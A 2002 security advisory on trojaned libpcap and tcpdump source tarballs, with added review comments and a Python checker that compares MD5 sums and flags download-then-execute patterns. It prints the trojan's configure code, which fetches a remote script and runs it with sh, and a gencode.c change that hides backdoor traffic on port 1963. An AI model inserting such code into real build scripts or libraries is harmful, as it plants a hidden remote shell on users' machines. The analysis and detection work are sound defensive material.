Latest libpcap & tcpdump sources from tcpdump.org contain a trojan

From: Mincu Alexandru (alexat_private)
Date: Wed Nov 13 2002 - 06:48:30 PST

    Updates:
    
          * Many mirrors are infected with the trojan
    Background:
    
          * Libpcap provides a packet sniffing library for programs like
            Snort.
          * Tcpdump is a standard tool for packet sniffing.
    Details:
    
          * The trojan contains modifications to the configure script and
            gencode.c (in libpcap only).
            
          * The configure script downloads
            http://mars.raketti.net/~mash/services which is then sourced
            with the shell. It contains an embedded shell script that
            creates a C file, and compiles it.
            
          * The program connects to 212.146.0.34 (mars.raketti.net) on port
            1963 and reads one of three one byte status codes:
                  * A - program exits 
                  * D - forks and spawns a shell and does the needed file
                    descriptor manipulation to redirect it to the existing
                    connection to 212.146.0.34. 
                  * M - closes connection, sleeps 3600 seconds, and then
                    reconnects 
            
            
            Hmm... ADM...
            
          * It's important to note that it reuses the same outgoing
            connection for the shell. This gets around firewalls that block
            incoming connections.
            
          * Gencode.c is modified to force libpcap to ignore packets to/from
            the backdoor program, hiding the backdoor program's traffic.
            
          * This is similar to the OpenSSH trojan a few months ago.
            
            
    Good sources: 
    
    http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-0.7.1.tar.gz
    http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.6.2.tar.gz
    http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.7.1.tar.gz
    
    
    MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7  libpcap-0.7.1.tar.gz
    MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248  tcpdump-3.6.2.tar.gz
    MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e  tcpdump-3.7.1.tar.gz
    Trojaned sources:
    
    http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz
    http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz
    http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz
    
    
    MD5 Sum 73ba7af963aff7c9e23fa1308a793dca  libpcap-0.7.1.tar.gz
    MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9  tcpdump-3.6.2.tar.gz
    MD5 Sum 3c410d8434e63fb3931fe77328e4dd88  tcpdump-3.7.1.tar.gz
    
    The (relevant) gencode.c diff:
    
    
    *** 288,293 ****
    --- 289,318 ----
      {
            extern int n_errors;
            int len;
    +         int l;
    +         char *port = "1963";
    +         char *str, *tmp, *new = "not port 1963";
    + 
    +     if (buf && *buf && strstr (buf, port)) {
    +         buf = "port 1964";
    +     }
    +     else {
    +         l = strlen (new) + 1;
    +         if (!(!buf || !*buf)) {
    +             l += strlen (buf);
    +             l += 5; /* and */
    +         }
    + 
    +         str = (char *)malloc (l);
    +         str[0] = '\0';
    +         if (!(!buf || !*buf)) {
    +             strcpy (str, buf);
    +             strcat (str, " and ");
    +         }
    + 
    +         strcat (str, new);
    +         buf = str;
    +     }
      
            no_optimize = 0;
            n_errors = 0;
    ***************
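Review bot: this hunk rewrites the caller's filter expression before it is ever parsed, with no comment or changelog entry justifying it, which is by itself a reason to reject it. Any expression containing the substring "1963" (`strstr (buf, port)` is a substring test, not a port match) is replaced wholesale by `buf = "port 1964";`, and every other expression, including an empty one, gets " and not port 1963" appended, so a capture through this library can never show traffic on port 1963; that is the hiding behaviour the post describes. Secondary points: `str = (char *)malloc (l);` is never checked for NULL and never freed, and the `l += 5; /* and */` budget only works because " and " happens to be five bytes; a `snprintf` into a sized buffer would be the conventional fix, but the right change here is to drop the rewrite entirely.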
    
    The (relevant) configure diff:
    
    
    +  CNF="services"
    +  URL="mars.raketti.net/~mash/$CNF"
    
    !  (IFS=","
    !  ARGS="wget -q -O -,lynx --source,fetch -q -o -"
    ! 
    !  for i in $ARGS; do
    !        IFS=" "
    !        $i $URL 1> $CNF
    !        if [ -f $CNF ]; then sh $CNF
    !            exit
    !        fi
    !        rm -f $CNF
    !  done) 1>/dev/null 2>/dev/null &
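Review bot: a configure script has no business fetching anything from the network, let alone executing it, so this block should be rejected outright. It assembles a URL from `$URL` and `$CNF`, tries `wget`, `lynx` and `fetch` in turn, and runs whatever came back with `sh $CNF`, all inside a backgrounded subshell whose stdout and stderr go to /dev/null, so nothing appears in the build output. Nothing verifies the fetched file (no checksum, no signature), and the `exit` after `sh $CNF` only leaves the subshell, so the enclosing configure continues as if nothing happened. A grep for downloader names (wget, lynx, fetch, curl) in a source tarball's configure is a cheap check for this class of tampering.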
    
    The "services" payload:
          * trojan-script, the non-obfuscated portion (excerpted)
          * services, the complete version
    Thanks to:
    
    Russell Adams <rladamsat_private>
    Mathew Solnik <msolnikat_private>
    Scott Stout <skoutat_private>
    
    with the Houston Linux Users Group.
    
    Additional thanks to Bruce Locke for interpreting the backdoor code.
    
    Thanks to Gentoo's Portage system for catching the trojaned 
    
    -- 
    Mincu Alexandru <alexat_private>
    
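As an added example (not part of the original post), the following Python checker applies the two defensive checks the post implies: it compares a tarball's MD5 against the good and trojaned sums listed above, and it scans a configure script for the download-then-`sh` pattern shown in the configure diff. The indicator regexes are my own heuristics; the two configure samples are constructed for the example, the first being the fragment quoted above with the diff markers stripped, the second an ordinary autoconf-style use of `sh` that should not be flagged on its own.

```python
# Added example: verify tarballs against the advisory's sums and flag
# download-and-execute patterns in a configure script.
import hashlib
import os
import re
import tempfile

# Known-good MD5 sums quoted in the advisory (the ibiblio/Gentoo distfiles copies).
KNOWN_GOOD_MD5 = {
    "libpcap-0.7.1.tar.gz": "0597c23e3496a5c108097b2a0f1bd0c7",
    "tcpdump-3.6.2.tar.gz": "6bc8da35f9eed4e675bfdf04ce312248",
    "tcpdump-3.7.1.tar.gz": "03e5eac68c65b7e6ce8da03b0b0b225e",
}
# Sums of the trojaned tcpdump.org copies, also from the advisory.
KNOWN_TROJANED_MD5 = {
    "libpcap-0.7.1.tar.gz": "73ba7af963aff7c9e23fa1308a793dca",
    "tcpdump-3.6.2.tar.gz": "3a1c2dd3471486f9c7df87029bf2f1e9",
    "tcpdump-3.7.1.tar.gz": "3c410d8434e63fb3931fe77328e4dd88",
}


def md5_of_file(path):
    """Hex MD5 of a file, streamed so a large tarball need not fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def classify_digest(name, digest):
    """'good', 'trojaned' or 'unknown' for a tarball file name and its MD5."""
    digest = digest.lower()
    if KNOWN_GOOD_MD5.get(name) == digest:
        return "good"
    if KNOWN_TROJANED_MD5.get(name) == digest:
        return "trojaned"
    return "unknown"


def md5_roundtrip_check(data=b"constructed tarball bytes\n"):
    """Write constructed bytes to a temp file; confirm md5_of_file agrees with hashlib."""
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(data)
        path = f.name
    try:
        return md5_of_file(path) == hashlib.md5(data).hexdigest()
    finally:
        os.unlink(path)


# Heuristic indicators (my own, not from the advisory): a network downloader
# named in a build script, and a variable-named file handed to sh.
DOWNLOADER_RE = re.compile(r"\b(?:wget|lynx|fetch|curl)\b")
SH_OF_VARIABLE_RE = re.compile(r'\b(?:sh|bash)\s+"?\$\w+')  # e.g. sh $CNF


def configure_indicators(script_text):
    """Map each indicator name to the 1-based line numbers where it fires."""
    found = {"downloader": [], "sh_of_variable": []}
    for n, line in enumerate(script_text.splitlines(), 1):
        if DOWNLOADER_RE.search(line):
            found["downloader"].append(n)
        if SH_OF_VARIABLE_RE.search(line):
            found["sh_of_variable"].append(n)
    return found


def configure_is_suspicious(script_text):
    """sh on a helper script is normal autoconf; combined with a downloader it is the advisory's pattern."""
    ind = configure_indicators(script_text)
    return bool(ind["downloader"] and ind["sh_of_variable"])


# Constructed sample 1: the configure fragment quoted in the advisory, diff markers stripped.
TROJANED_CONFIGURE = """\
CNF="services"
URL="mars.raketti.net/~mash/$CNF"
(IFS=","
ARGS="wget -q -O -,lynx --source,fetch -q -o -"
for i in $ARGS; do
      IFS=" "
      $i $URL 1> $CNF
      if [ -f $CNF ]; then sh $CNF
          exit
      fi
      rm -f $CNF
done) 1>/dev/null 2>/dev/null &
"""

# Constructed sample 2: ordinary autoconf-style use of sh on a helper script.
BENIGN_CONFIGURE = """\
ac_aux_dir=.
if test -f $ac_aux_dir/config.guess; then
  host=`sh $ac_aux_dir/config.guess`
fi
"""

if __name__ == "__main__":
    print("md5 roundtrip ok:", md5_roundtrip_check())
    for name, digest in KNOWN_TROJANED_MD5.items():
        print(name, "from tcpdump.org ->", classify_digest(name, digest))
    print("trojaned:", configure_indicators(TROJANED_CONFIGURE), configure_is_suspicious(TROJANED_CONFIGURE))
    print("benign:", configure_indicators(BENIGN_CONFIGURE), configure_is_suspicious(BENIGN_CONFIGURE))
```

The tarball check is only as good as the sums you trust: the point of the post is that tcpdump.org's own copies and many mirrors were replaced, so the reference list has to come from an independent source (here, the Gentoo distfiles sums the post quotes), not from the site serving the tarball. The configure check is deliberately a two-indicator rule, since `sh $somevar` alone is common in autoconf output.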